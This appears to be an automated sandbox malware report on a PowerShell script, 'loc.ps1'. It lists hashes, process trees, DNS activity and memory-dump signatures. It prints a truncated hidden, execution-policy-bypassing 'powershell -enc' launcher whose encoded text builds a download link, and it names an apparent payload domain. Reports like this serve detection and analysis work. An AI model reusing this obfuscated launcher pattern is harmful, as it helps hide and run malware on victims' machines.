Preview: ...................................FL..................F.".. .......-..7.4..a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....................t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..V3......Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..V3......Y....................f...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......NM..V3......Y.....................f0.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......NM..U.......Y.....................@9.W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..U.......Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..U.......Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......NM..U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......NM..P......Y..........

File type: Unicode text, UTF-8 (with BOM) text, with very long lines (4805), with no line terminators
Entropy (8bit): 4.261717793830267
TrID:
• Text - UTF-8 encoded (3003/1) 100.00%
File name: loc.ps1
File size: 4808
MD5: d7bd6a17466dbe1e448956b0018ad94d
SHA1: a9d50d22cc9024dc6bd3297286783ef4b38d6f99
SHA256: 5f5f8f102490525c22deed33b94fa01b52289e7166eedccd04cfece900958669
SHA512: 83b312bdce897983350521d8374c83403204b87f7d433c6b81b5f6ecd0d8011e91f77144caddbdd4c5596d9898ff6da750eca7f385688442797190543bcb1d4c
SSDEEP: 96:X6rCx5wroLBS4ch7S3NF7wJJTZW+1/BrbBEnwOeelJXk6ccWeCfNYV:q2fwroXY7S3NF7wplBrlEnwkxccWq
TLSH: AAA1C078C775A9C00AF972C05EE138496078AD23C6748A78E96D4CE77D78601DF356B8
File Content Preview: ...powershell -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA
Icon Hash: 3270d6baae77db44

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 28, 2023 09:33:59.266446114 CEST | 53 | 65323 | 8.8.8.8 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 28, 2023 09:33:59.266446114 CEST | 8.8.8.8 | 192.168.2.5 | 0xaa9b | Server failure (2) | usherskenya.co.ke | none | none | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 09:33:49
Start date: 28/05/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1
Imagebase: 0x7ff7fbaf0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 1
Start time: 09:33:49
Start date: 28/05/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fcd70000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 09:33:51
Start date: 28/05/2023
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc 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
Imagebase: 0x7ff7fbaf0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Memory Dump Source
• Source File: 00000000.00000002.480623123.00007FF9A56D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff9a56d0000_powershell.jbxd
Execution Graph

Execution Coverage: 7.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 8
Total number of Limit Nodes: 0

                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9a872d1df9e5f7e1fa341b8a418d0431d123aac15be946d79755914aa33dfa1b
                  • Instruction ID: 624ea82b8e0de452c7a383c671062284e5ad46abfd89052f39da0dfb4d1b2f7c
                  • Opcode Fuzzy Hash: 9a872d1df9e5f7e1fa341b8a418d0431d123aac15be946d79755914aa33dfa1b
                  • Instruction Fuzzy Hash: 2C72B131A18A098FDB49EB68D4946F977E2FF5A314F10417DD44EE7292CE78B842CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (Control-flow graph rendered as a figure in the original report; first basic block 7ff9a5707ca2-7ff9a5707cf6. Edge list not reproduced.)
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 06350e50e8833fc3b503b33ebb0072517c7d8a1d4e1a62adc2ef0a36daa3db18
                  • Instruction ID: 0201c3d2dc36701318982e6df3826a0744821e5d305d260e5b7e81ccb663d3fc
                  • Opcode Fuzzy Hash: 06350e50e8833fc3b503b33ebb0072517c7d8a1d4e1a62adc2ef0a36daa3db18
                  • Instruction Fuzzy Hash: FD320531B0DA4A4FEB99DB3894557B9BBD1FF8A710F04017ED48DE72D2CE6868428341
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cffd0279b31c1ceb0ffe1b5cdf0b09e1d722fcd40c4cd050c156d62305501451
                  • Instruction ID: 75ec7e5a94938480b1ba8f17117ea6b8942d2a5dcb6109c82be7ea4a77f82d82
                  • Opcode Fuzzy Hash: cffd0279b31c1ceb0ffe1b5cdf0b09e1d722fcd40c4cd050c156d62305501451
                  • Instruction Fuzzy Hash: FBD1D631B1CA495FEF98DF2894557B9BBE1FF9A700F04017EE48DE3292CE68A8418745
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d922986d412800650ed709a12714a89fb89d8b393698b4ec7a64891ffa366560
                  • Instruction ID: 438054fb830a8e3dfab47b32238f79927f293fa005cb55cc4c3f5d0d4ebed791
                  • Opcode Fuzzy Hash: d922986d412800650ed709a12714a89fb89d8b393698b4ec7a64891ffa366560
                  • Instruction Fuzzy Hash: A04127F1A0DA594FEB98D72C94457B577E1FF96720F04427AC08DE3192DE68AC42C781
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (Control-flow graph rendered as a figure in the original report; first basic block 7ff9a571ac51-7ff9a571ac5d, with a call to RtlDecodePointer. Edge list not reproduced.)
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e1fed002bfcf253b554c5c6c733bfcb6654e272dde0dfed95ccc0391d879237
                  • Instruction ID: 939036c8204e500885c0fa3cbdbdc2d6c74c06d62db4a84fbb660ca47a68715d
                  • Opcode Fuzzy Hash: 1e1fed002bfcf253b554c5c6c733bfcb6654e272dde0dfed95ccc0391d879237
                  • Instruction Fuzzy Hash: B7313470A0DA8C5FEB59DB6888097B6BFE0FB53321F04416FD0C9D2152DAA86816C7D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (Control-flow graph rendered as a figure in the original report; first basic block 7ff9a571acd0-7ff9a571ace6, with a call to RtlDecodePointer. Edge list not reproduced.)
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID: DecodePointer
                  • String ID:
                  • API String ID: 3527080286-0
                  • Opcode ID: 0b267759d266a46ec3f04d553b1714cbeb5a1f27609a79466841cbc7dec941af
                  • Instruction ID: aa700cda2d01b7bafb9d5a5118432ef5d818649220c17e98c2cb07ed625a9b8b
                  • Opcode Fuzzy Hash: 0b267759d266a46ec3f04d553b1714cbeb5a1f27609a79466841cbc7dec941af
                  • Instruction Fuzzy Hash: 58015E3160CA4D8EE758DB5CD009BA5BBE0F759322F00822AC049C3551D7B9645ACBD1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (Control-flow graph rendered as a figure in the original report; first basic block 7ff9a5709b70-7ff9a5709b86, with a call to RtlEncodePointer. Edge list not reproduced.)
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  • Opcode ID: 7cb0c9c64cbb73a67b3ff152ac9da7ab74c7c5dc75c04196a1ca98271301bf27
                  • Instruction ID: 170bae145e90a190b08e3381845a1551bbe2d8777bcb4d508ff75b95f466fda5
                  • Opcode Fuzzy Hash: 7cb0c9c64cbb73a67b3ff152ac9da7ab74c7c5dc75c04196a1ca98271301bf27
                  • Instruction Fuzzy Hash: 0C019E7160CA088EEB58DB5CD40ABF8BBE0FB55332F00822EC059D3551D7B96055CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  (Control-flow graph rendered as a figure in the original report; first basic block 7ff9a5ad05ed-7ff9a5ad0679. Edge list not reproduced.)
                  Memory Dump Source
                  • Source File: 00000002.00000002.469401737.00007FF9A5AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5AD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5ad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b1e548556a88d314fce361cec698b29fbbf49efc738b22823d9f4b2f430ccb0
                  • Instruction ID: b730392a70b0880173b634d96a0790f3eabba63e735be38f89f4efb8dbb4105e
                  • Opcode Fuzzy Hash: 6b1e548556a88d314fce361cec698b29fbbf49efc738b22823d9f4b2f430ccb0
                  • Instruction Fuzzy Hash: 2402E222B0EBC64FE796E73858693B47FE1FF57610B0941FAC08DCB193E958A8468351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b59e45b9c73c8765b4468be231dfbdaf4a0ffc96b1aca6b898ef176ad789f397
                  • Instruction ID: 356914f02f81ff008261a758a9b8315a41abb98897dca5339ea8db7e34681e95
                  • Opcode Fuzzy Hash: b59e45b9c73c8765b4468be231dfbdaf4a0ffc96b1aca6b898ef176ad789f397
                  • Instruction Fuzzy Hash: 24C13932A0EB8A4FE7A6E72858956B57FE1EF67710B0800FFD48DCB193D918A805C751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.469401737.00007FF9A5AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5AD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5ad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d17662c22485fa23aaee8442dbb20960e9006983c2b8218c81ee86087dc558d2
                  • Instruction ID: 14683fde84bebe04474666e6f7cbf72eb8c5bc84e3342510331a3acd1def96aa
                  • Opcode Fuzzy Hash: d17662c22485fa23aaee8442dbb20960e9006983c2b8218c81ee86087dc558d2
                  • Instruction Fuzzy Hash: 3161BD23F1EB860FE7E9E62854693B86AD1FF56B10B5800BED08DC7182FD59BC058381
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 651c67da44f19faf48e26c2202e31c5663be67ff05cc245ac70d0366a2ce1b04
                  • Instruction ID: 55f324a82d8536b06802404a76bc5fcc9ca4dd1a443fb46bffc661c3ebbb0280
                  • Opcode Fuzzy Hash: 651c67da44f19faf48e26c2202e31c5663be67ff05cc245ac70d0366a2ce1b04
                  • Instruction Fuzzy Hash: 5E51F122B0FB864FE7A6E72844A52B87BD1EF27650B5800FEC08DDB1C3D919AC058B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 585b15f3759bf3b66218705270263627e3d01a1d827831d5409bf67b8b9965e3
                  • Instruction ID: 672d2fbd05186fd226fb522cb7d44b5ae20a264da8d4bff22dd47a01907b1432
                  • Opcode Fuzzy Hash: 585b15f3759bf3b66218705270263627e3d01a1d827831d5409bf67b8b9965e3
                  • Instruction Fuzzy Hash: 37310112B0EBC90FD7828B3D68646B07FE1EF97610B0D01FBC0C8CB1A3E94AA8458751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.466846873.00007FF9A57D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A57D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a57d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c066d33b954d845baff4319381a4cacccb227ef46752664da600818b7e6b5438
                  • Instruction ID: 0724fff449312ea14dc6cc103992b4a7e0f841982cc56c8275ee09b83ac3bdbe
                  • Opcode Fuzzy Hash: c066d33b954d845baff4319381a4cacccb227ef46752664da600818b7e6b5438
                  • Instruction Fuzzy Hash: 49319E52A0F7C55FE342977968292746FA0EF576A0B1940FBD4C9DB093E8892C098762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: F^_H
                  • API String ID: 0-3158135678
                  • Opcode ID: 29f33100cbe2ad7613e11fc584df417351b3b1ad0a1f23b25bbf5592f90d2912
                  • Instruction ID: 8ceabce5cba4da242bd8a32e509dafe342320320aa556b0cd86a696ec80b841c
                  • Opcode Fuzzy Hash: 29f33100cbe2ad7613e11fc584df417351b3b1ad0a1f23b25bbf5592f90d2912
                  • Instruction Fuzzy Hash: E4F10271B0EB8A4FDB56D738A8146B57BE1EF97710B0941FAD48CCB193DE586806C382
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1bf4d03069e8cde45dd41f688b9abb282415f1d1ea7a76b0342299edc4ada48
                  • Instruction ID: d97d97b706841877691d90de4ec4ac9d88c17d7b0c0f4631cb79d6dc5e86009b
                  • Opcode Fuzzy Hash: f1bf4d03069e8cde45dd41f688b9abb282415f1d1ea7a76b0342299edc4ada48
                  • Instruction Fuzzy Hash: 66B16A31B1DA4A4FDB69DB1CE880671B7D1FF46710B1485BEC4CEC7592DA65B842C780
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b1f6f7545bcec471c489e9e03b324763d407a09dbe07d598490c5cde66ea6877
                  • Instruction ID: 9a3800922d792bce02dd78b9751d49b474ec7c3f6387bd824bea8de5d15cf8e7
                  • Opcode Fuzzy Hash: b1f6f7545bcec471c489e9e03b324763d407a09dbe07d598490c5cde66ea6877
                  • Instruction Fuzzy Hash: 9A513A32A0DA594FEB58DB69A8852F277D0EB86720B05817BD4CEC7193D9687C458380
                  Uniqueness

                  Uniqueness Score: -1.00%